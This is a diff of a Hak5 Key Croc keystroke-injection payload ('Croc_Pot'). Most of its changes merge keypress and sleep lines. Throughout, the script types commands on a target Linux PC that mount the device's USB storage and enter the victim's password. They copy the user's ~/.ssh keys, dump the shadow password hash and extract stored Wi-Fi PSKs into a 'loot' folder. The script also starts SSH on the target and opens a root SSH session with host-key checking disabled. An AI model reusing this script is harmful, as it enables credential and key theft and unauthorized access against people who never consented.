Q STRING "sudo getent shadow \$(whoami) | tee \${PC_LOOT}/target_hash_passwd"
|
||||||
Q ENTER
|
Q ENTER ; sleep 2
|
||||||
sleep 2
|
|
||||||
#---> Return back to ATTACKMODE HID mode
|
#---> Return back to ATTACKMODE HID mode
|
||||||
ATTACKMODE HID
|
ATTACKMODE HID
|
||||||
sleep 1 ;;
|
sleep 1 ;;
|
||||||
${TARGET_HOSTNAME})
|
${TARGET_HOSTNAME})
|
||||||
#---> Start mate-terminal -->Parrot OS<--
|
#---> Start mate-terminal -->Parrot OS<--
|
||||||
Q ALT F2
|
Q ALT F2
|
||||||
sleep 1
|
sleep 1
|
||||||
Q STRING "mate-terminal"
|
Q STRING "mate-terminal"
|
||||||
Q ENTER
|
Q ENTER ; sleep 1
|
||||||
sleep 1
|
|
||||||
#---> Check numlock state on or off
|
#---> Check numlock state on or off
|
||||||
Q STRING "if [ \$(xset -q | grep -Po '(?<=Num Lock:)\W*\K[^ ]*') == \"off\" ]; then echo -ne \"\n\nNUMLOCK STATE: OFF Payload may fail trun NUMLOCK ON\n\n\" ; else echo -ne \"\n\nNUMLOCK STATE: ON\n\n\"; fi" ; Q ENTER
|
Q STRING "if [ \$(xset -q | grep -Po '(?<=Num Lock:)\W*\K[^ ]*') == \"off\" ]; then echo -ne \"\n\nNUMLOCK STATE: OFF Payload may fail trun NUMLOCK ON\n\n\" ; else echo -ne \"\n\nNUMLOCK STATE: ON\n\n\"; fi" ; Q ENTER
|
||||||
Q ENTER
|
Q ENTER ; sleep 3
|
||||||
sleep 3
|
|
||||||
#---> Create keycroc directory, Mount keycroc usb drive to target pc, Make KeyCroc folder executable
|
#---> Create keycroc directory, Mount keycroc usb drive to target pc, Make KeyCroc folder executable
|
||||||
Q STRING "sudo mkdir /media/\$(whoami)/KeyCroc/ ; sudo mount /dev/sdd /media/\$(whoami)/KeyCroc/ ; sudo chmod 777 /media/\$(whoami)/KeyCroc/"
|
Q STRING "sudo mkdir /media/\$(whoami)/KeyCroc/ ; sudo mount /dev/sdd /media/\$(whoami)/KeyCroc/ ; sudo chmod 777 /media/\$(whoami)/KeyCroc/"
|
||||||
Q ENTER
|
Q ENTER ; sleep 2
|
||||||
sleep 2
|
|
||||||
#---> Entering Linux passwd
|
#---> Entering Linux passwd
|
||||||
Q STRING "${PC_PW}"
|
Q STRING "${PC_PW}"
|
||||||
Q ENTER
|
Q ENTER ; sleep 1
|
||||||
sleep 1
|
|
||||||
#---> Place keycroc usb drive into variable
|
#---> Place keycroc usb drive into variable
|
||||||
Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt"
|
Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt"
|
||||||
Q ENTER
|
Q ENTER ; sleep 1
|
||||||
sleep 1
|
|
||||||
Q STRING "PC_LOOT=/media/\$(whoami)/KeyCroc/loot/Croc_Pot"
|
Q STRING "PC_LOOT=/media/\$(whoami)/KeyCroc/loot/Croc_Pot"
|
||||||
Q ENTER
|
Q ENTER ; sleep 1
|
||||||
sleep 1
|
|
||||||
#---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
|
#---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
|
||||||
Q STRING "whoami | sudo tee \${PC_USER}"
|
Q STRING "whoami | sudo tee \${PC_USER}"
|
||||||
Q ENTER
|
Q ENTER ; sleep 1
|
||||||
sleep 1
|
|
||||||
#---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt
|
#---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt
|
||||||
Q STRING "hostname -I | awk '{print \$1}' | sudo tee -a \${PC_USER} && ip -4 -o addr show eth0 | awk '{print \$4}' | cut -d \"/\" -f 1 | sudo tee -a \${PC_USER} && ip -4 -o addr show eth1 | awk '{print \$4}' | cut -d \"/\" -f 1 | sudo tee -a \${PC_USER} && sudo echo '' >> \${PC_USER}"
|
Q STRING "hostname -I | awk '{print \$1}' | sudo tee -a \${PC_USER} && ip -4 -o addr show eth0 | awk '{print \$4}' | cut -d \"/\" -f 1 | sudo tee -a \${PC_USER} && ip -4 -o addr show eth1 | awk '{print \$4}' | cut -d \"/\" -f 1 | sudo tee -a \${PC_USER} && sudo echo '' >> \${PC_USER}"
|
||||||
Q ENTER
|
Q ENTER ; sleep 1
|
||||||
sleep 1
|
#---> Check with nmap SSH status of target pc
|
||||||
#---> Check SSH status is running
|
|
||||||
if [ "$(nmap `sed -n 2p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt` -PN -p ssh | egrep -o 'open|closed|filtered')" = "closed" ]; then
|
if [ "$(nmap `sed -n 2p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt` -PN -p ssh | egrep -o 'open|closed|filtered')" = "closed" ]; then
|
||||||
Q STRING "sudo systemctl start ssh"
|
Q STRING "sudo systemctl start ssh"
|
||||||
Q ENTER
|
Q ENTER
|
||||||
|
@ -269,87 +269,68 @@ ${TARGET_HOSTNAME})
|
||||||
sleep 1
|
sleep 1
|
||||||
#---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
|
#---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
|
||||||
Q STRING "sudo grep -r '^psk=' /etc/NetworkManager/system-connections/ | sed -E -e 's/[/]//g' -e 's/etc//g' -e 's/NetworkManagersystem-connections//g' -e 's/.nmconnection:psk//g' | sudo tee -a \${PC_USER}"
|
Q STRING "sudo grep -r '^psk=' /etc/NetworkManager/system-connections/ | sed -E -e 's/[/]//g' -e 's/etc//g' -e 's/NetworkManagersystem-connections//g' -e 's/.nmconnection:psk//g' | sudo tee -a \${PC_USER}"
|
||||||
Q ENTER
|
Q ENTER ; sleep 1
|
||||||
sleep 1
|
|
||||||
#---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
|
#---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
|
||||||
Q STRING "ip -o link | awk '\$2 != \"lo:\" {print \$2, \$(NF-2)}' | sudo tee -a \${PC_USER}"
|
Q STRING "ip -o link | awk '\$2 != \"lo:\" {print \$2, \$(NF-2)}' | sudo tee -a \${PC_USER}"
|
||||||
Q ENTER
|
Q ENTER ; sleep 1
|
||||||
sleep 1
|
|
||||||
#---> Retrieve Shark Jack IP if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
|
#---> Retrieve Shark Jack IP if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
|
||||||
Q STRING "ping -c1 -w1 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
|
Q STRING "ping -c1 -w1 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
|
||||||
Q ENTER
|
Q ENTER ; sleep 5
|
||||||
sleep 5
|
|
||||||
#---> Retrieve Shark Jack MAC address if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
|
#---> Retrieve Shark Jack MAC address if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
|
||||||
Q STRING "arp shark.lan | awk '/'shark.lan'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
|
Q STRING "arp shark.lan | awk '/'shark.lan'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
|
||||||
Q ENTER
|
Q ENTER ; sleep 2
|
||||||
sleep 2
|
|
||||||
#---> Retrieve packet squirrel MAC address if connected to local network as target PC & save to tools/Croc_Pot/squirrel_mac.txt
|
#---> Retrieve packet squirrel MAC address if connected to local network as target PC & save to tools/Croc_Pot/squirrel_mac.txt
|
||||||
Q STRING "arp squirrel.lan | awk '/'squirrel.lan'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/squirrel_mac.txt"
|
Q STRING "arp squirrel.lan | awk '/'squirrel.lan'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/squirrel_mac.txt"
|
||||||
Q ENTER
|
Q ENTER ; sleep 2
|
||||||
sleep 2
|
|
||||||
#---> Retrieve Lan turtle IP if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
|
#---> Retrieve Lan turtle IP if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
|
||||||
Q STRING "ping -c1 -w1 turtle | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
|
Q STRING "ping -c1 -w1 turtle | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
|
||||||
Q ENTER
|
Q ENTER ; sleep 2
|
||||||
sleep 2
|
|
||||||
#---> Retrieve Lan turtle MAC address if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
|
#---> Retrieve Lan turtle MAC address if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
|
||||||
Q STRING "arp turtle | awk '/'turtle'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
|
Q STRING "arp turtle | awk '/'turtle'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
|
||||||
Q ENTER
|
Q ENTER ; sleep 2
|
||||||
sleep 2
|
|
||||||
#---> Retrieve Bash Bunny MAC address if connected to local network as target PC ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt
|
#---> Retrieve Bash Bunny MAC address if connected to local network as target PC ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt
|
||||||
Q STRING "arp 172.16.64.1 | awk '/'172.16.64.1'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/bunny_mac.txt"
|
Q STRING "arp 172.16.64.1 | awk '/'172.16.64.1'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/bunny_mac.txt"
|
||||||
Q ENTER
|
Q ENTER ; sleep 2
|
||||||
sleep 2
|
|
||||||
#---> Retrieve target PC .ssh file save to /loot/Croc_Pot/SSH
|
#---> Retrieve target PC .ssh file save to /loot/Croc_Pot/SSH
|
||||||
Q STRING "sudo cp -fr ~/.ssh/. \${PC_LOOT}/SSH/"
|
Q STRING "sudo cp -fr ~/.ssh/. \${PC_LOOT}/SSH/"
|
||||||
Q ENTER
|
Q ENTER ; sleep 2
|
||||||
sleep 2
|
|
||||||
#---> Retrieve target hash passwd save to /loot/Croc_Pot/target_hash_passwd.txt
|
#---> Retrieve target hash passwd save to /loot/Croc_Pot/target_hash_passwd.txt
|
||||||
Q STRING "sudo getent shadow \$(whoami) | sudo tee \${PC_LOOT}/target_hash_passwd"
|
Q STRING "sudo getent shadow \$(whoami) | sudo tee \${PC_LOOT}/target_hash_passwd"
|
||||||
Q ENTER
|
Q ENTER ; sleep 2
|
||||||
sleep 2
|
|
||||||
#---> Unmount keycroc usb drive
|
#---> Unmount keycroc usb drive
|
||||||
Q STRING "sudo umount /media/\$(whoami)/KeyCroc/"
|
Q STRING "sudo umount /media/\$(whoami)/KeyCroc/"
|
||||||
Q ENTER
|
Q ENTER ; sleep 1
|
||||||
sleep 1
|
|
||||||
#---> Return back to ATTACKMODE HID mode
|
#---> Return back to ATTACKMODE HID mode
|
||||||
ATTACKMODE HID
|
ATTACKMODE HID
|
||||||
#---> Remove keycroc directory off target pc
|
#---> Remove keycroc directory off target pc
|
||||||
Q STRING "sudo rmdir /media/\$(whoami)/KeyCroc/"
|
Q STRING "sudo rmdir /media/\$(whoami)/KeyCroc/"
|
||||||
Q ENTER
|
Q ENTER ; sleep 1 ;;
|
||||||
sleep 1 ;;
|
*)
|
||||||
*)
|
|
||||||
#---> Start linux distributions terminal xterm
|
#---> Start linux distributions terminal xterm
|
||||||
#---> Unsure of which linux distribution this will work on
|
#---> Unsure of which linux distribution this will work on
|
||||||
Q ALT F2
|
Q ALT F2
|
||||||
sleep 1
|
sleep 1
|
||||||
Q STRING "xterm"
|
Q STRING "xterm"
|
||||||
Q ENTER
|
Q ENTER ; sleep 1
|
||||||
sleep 1
|
|
||||||
#---> Check numlock state on or off
|
#---> Check numlock state on or off
|
||||||
Q STRING "if [ \$(xset -q | grep -Po '(?<=Num Lock:)\W*\K[^ ]*') == \"off\" ]; then echo -ne \"\n\nNUMLOCK STATE: OFF Payload may fail trun NUMLOCK ON\n\n\" ; else echo -ne \"\n\nNUMLOCK STATE: ON\n\n\"; fi" ; Q ENTER
|
Q STRING "if [ \$(xset -q | grep -Po '(?<=Num Lock:)\W*\K[^ ]*') == \"off\" ]; then echo -ne \"\n\nNUMLOCK STATE: OFF Payload may fail trun NUMLOCK ON\n\n\" ; else echo -ne \"\n\nNUMLOCK STATE: ON\n\n\"; fi" ; Q ENTER
|
||||||
Q ENTER
|
Q ENTER ; sleep 3
|
||||||
sleep 3
|
|
||||||
#---> Create keycroc directory, Mount keycroc usb drive to target pc, Make KeyCroc folder executable
|
#---> Create keycroc directory, Mount keycroc usb drive to target pc, Make KeyCroc folder executable
|
||||||
Q STRING "sudo mkdir /media/\$(whoami)/KeyCroc/ ; sudo mount /dev/sdd /media/\$(whoami)/KeyCroc/ ; sudo chmod 777 /media/\$(whoami)/KeyCroc/"
|
Q STRING "sudo mkdir /media/\$(whoami)/KeyCroc/ ; sudo mount /dev/sdd /media/\$(whoami)/KeyCroc/ ; sudo chmod 777 /media/\$(whoami)/KeyCroc/"
|
||||||
Q ENTER
|
Q ENTER ; sleep 1
|
||||||
sleep 1
|
|
||||||
#---> Entering Linux passwd
|
#---> Entering Linux passwd
|
||||||
Q STRING "${PC_PW}"
|
Q STRING "${PC_PW}"
|
||||||
Q ENTER
|
Q ENTER ; sleep 1
|
||||||
sleep 1
|
|
||||||
#---> Place keycroc usb drive into variable
|
#---> Place keycroc usb drive into variable
|
||||||
Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt"
|
Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt"
|
||||||
Q ENTER
|
Q ENTER ; sleep 1
|
||||||
sleep 1
|
|
||||||
#---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
|
#---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
|
||||||
Q STRING "whoami | sudo tee \${PC_USER}"
|
Q STRING "whoami | sudo tee \${PC_USER}"
|
||||||
Q ENTER
|
Q ENTER ; sleep 1
|
||||||
sleep 1
|
|
||||||
#---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt
|
#---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt
|
||||||
Q STRING "hostname -I | sudo tee -a \${PC_USER} && ip -4 -o addr show eth0 | awk '{print \$4}' | cut -d \"/\" -f 1 | sudo tee -a \${PC_USER} && ip -4 -o addr show eth1 | awk '{print \$4}' | cut -d \"/\" -f 1 | sudo tee -a \${PC_USER} && sudo echo '' >> \${PC_USER}"
|
Q STRING "hostname -I | sudo tee -a \${PC_USER} && ip -4 -o addr show eth0 | awk '{print \$4}' | cut -d \"/\" -f 1 | sudo tee -a \${PC_USER} && ip -4 -o addr show eth1 | awk '{print \$4}' | cut -d \"/\" -f 1 | sudo tee -a \${PC_USER} && sudo echo '' >> \${PC_USER}"
|
||||||
Q ENTER
|
Q ENTER ; sleep 1
|
||||||
sleep 1
|
#---> Check with nmap SSH status of target pc
|
||||||
#---> Check SSH status is running
|
|
||||||
if [ "$(nmap `sed -n 2p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt` -PN -p ssh | egrep -o 'open|closed|filtered')" = "closed" ]; then
|
if [ "$(nmap `sed -n 2p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt` -PN -p ssh | egrep -o 'open|closed|filtered')" = "closed" ]; then
|
||||||
Q STRING "sudo systemctl start ssh"
|
Q STRING "sudo systemctl start ssh"
|
||||||
Q ENTER
|
Q ENTER
|
||||||
|
@ -360,65 +341,51 @@ ${TARGET_HOSTNAME})
|
||||||
sleep 1
|
sleep 1
|
||||||
#---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
|
#---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
|
||||||
Q STRING "sudo grep -r '^psk=' /etc/NetworkManager/system-connections/ | sed -E -e 's/[/]//g' -e 's/etc//g' -e 's/NetworkManagersystem-connections//g' -e 's/.nmconnection:psk//g' | sudo tee -a \${PC_USER}"
|
Q STRING "sudo grep -r '^psk=' /etc/NetworkManager/system-connections/ | sed -E -e 's/[/]//g' -e 's/etc//g' -e 's/NetworkManagersystem-connections//g' -e 's/.nmconnection:psk//g' | sudo tee -a \${PC_USER}"
|
||||||
Q ENTER
|
Q ENTER ; sleep 1
|
||||||
sleep 1
|
|
||||||
#---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
|
#---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
|
||||||
Q STRING "ip -o link | awk '\$2 != \"lo:\" {print \$2, \$(NF-2)}' | sudo tee -a \${PC_USER}"
|
Q STRING "ip -o link | awk '\$2 != \"lo:\" {print \$2, \$(NF-2)}' | sudo tee -a \${PC_USER}"
|
||||||
Q ENTER
|
Q ENTER ; sleep 1
|
||||||
sleep 1
|
|
||||||
#---> Retrieve Shark Jack IP if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
|
#---> Retrieve Shark Jack IP if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
|
||||||
Q STRING "ping -c1 -w1 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
|
Q STRING "ping -c1 -w1 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
|
||||||
Q ENTER
|
Q ENTER ; sleep 5
|
||||||
sleep 5
|
|
||||||
#---> Retrieve Shark Jack MAC address if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
|
#---> Retrieve Shark Jack MAC address if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
|
||||||
Q STRING "arp shark.lan | awk '/'shark.lan'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
|
Q STRING "arp shark.lan | awk '/'shark.lan'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
|
||||||
Q ENTER
|
Q ENTER ; sleep 2
|
||||||
sleep 2
|
|
||||||
#---> Retrieve packet squirrel MAC address if connected to local network as target PC & save to tools/Croc_Pot/squirrel_mac.txt
|
#---> Retrieve packet squirrel MAC address if connected to local network as target PC & save to tools/Croc_Pot/squirrel_mac.txt
|
||||||
Q STRING "arp squirrel.lan | awk '/'squirrel.lan'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/squirrel_mac.txt"
|
Q STRING "arp squirrel.lan | awk '/'squirrel.lan'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/squirrel_mac.txt"
|
||||||
Q ENTER
|
Q ENTER ; sleep 2
|
||||||
sleep 2
|
|
||||||
#---> Retrieve Lan turtle IP if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
|
#---> Retrieve Lan turtle IP if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
|
||||||
Q STRING "ping -c1 -w1 turtle | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
|
Q STRING "ping -c1 -w1 turtle | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
|
||||||
Q ENTER
|
Q ENTER ; sleep 2
|
||||||
sleep 2
|
|
||||||
#---> Retrieve Lan turtle MAC address if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
|
#---> Retrieve Lan turtle MAC address if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
|
||||||
Q STRING "arp turtle | awk '/'turtle'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
|
Q STRING "arp turtle | awk '/'turtle'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
|
||||||
Q ENTER
|
Q ENTER ; sleep 2
|
||||||
sleep 2
|
|
||||||
#---> Retrieve Bash Bunny MAC address if connected to local network as target PC ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt
|
#---> Retrieve Bash Bunny MAC address if connected to local network as target PC ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt
|
||||||
Q STRING "arp 172.16.64.1 | awk '/'172.16.64.1'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/bunny_mac.txt"
|
Q STRING "arp 172.16.64.1 | awk '/'172.16.64.1'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/bunny_mac.txt"
|
||||||
Q ENTER
|
Q ENTER ; sleep 2
|
||||||
sleep 2
|
|
||||||
#---> Retrieve target PC .ssh file save to /loot/Croc_Pot/SSH
|
#---> Retrieve target PC .ssh file save to /loot/Croc_Pot/SSH
|
||||||
Q STRING "sudo cp -fr ~/.ssh/. \${PC_LOOT}/SSH/"
|
Q STRING "sudo cp -fr ~/.ssh/. \${PC_LOOT}/SSH/"
|
||||||
Q ENTER
|
Q ENTER ; sleep 2
|
||||||
sleep 2
|
|
||||||
#---> Retrieve target hash passwd save to /loot/Croc_Pot/target_hash_passwd.txt
|
#---> Retrieve target hash passwd save to /loot/Croc_Pot/target_hash_passwd.txt
|
||||||
Q STRING "sudo getent shadow \$(whoami) | sudo tee \${PC_LOOT}/target_hash_passwd"
|
Q STRING "sudo getent shadow \$(whoami) | sudo tee \${PC_LOOT}/target_hash_passwd"
|
||||||
Q ENTER
|
Q ENTER ; sleep 2
|
||||||
sleep 2
|
|
||||||
#---> Unmount keycroc usb drive
|
#---> Unmount keycroc usb drive
|
||||||
Q STRING "sudo umount /media/\$(whoami)/KeyCroc/"
|
Q STRING "sudo umount /media/\$(whoami)/KeyCroc/"
|
||||||
Q ENTER
|
Q ENTER ; sleep 1
|
||||||
sleep 1
|
|
||||||
#---> Return back to ATTACKMODE HID mode
|
#---> Return back to ATTACKMODE HID mode
|
||||||
ATTACKMODE HID
|
ATTACKMODE HID
|
||||||
#---> Remove keycroc directory off target pc
|
#---> Remove keycroc directory off target pc
|
||||||
Q STRING "sudo rmdir /media/\$(whoami)/KeyCroc/"
|
Q STRING "sudo rmdir /media/\$(whoami)/KeyCroc/"
|
||||||
Q ENTER
|
Q ENTER ; sleep 1 ;;
|
||||||
sleep 1 ;;
|
|
||||||
esac
|
esac
|
||||||
;;
|
;;
|
||||||
esac
|
esac
|
||||||
#---> Start SSH session with target PC
|
#---> Start SSH session with target PC
|
||||||
Q STRING "ssh -o \"StrictHostKeyChecking no\" root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
|
Q STRING "ssh -o \"StrictHostKeyChecking no\" root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
|
||||||
Q ENTER
|
Q ENTER ; sleep 2
|
||||||
sleep 2
|
|
||||||
#---> Entering keycroc passwd
|
#---> Entering keycroc passwd
|
||||||
Q STRING "${CROC_PW}"
|
Q STRING "${CROC_PW}"
|
||||||
Q ENTER
|
Q ENTER ; sleep 1
|
||||||
sleep 1
|
|
||||||
#---> Starting Croc_Pot
|
#---> Starting Croc_Pot
|
||||||
Q STRING "/root/udisk/tools/Croc_Pot.sh"
|
Q STRING "/root/udisk/tools/Croc_Pot.sh"
|
||||||
Q ENTER
|
Q ENTER
|
||||||
|
|
Loading…
Reference in New Issue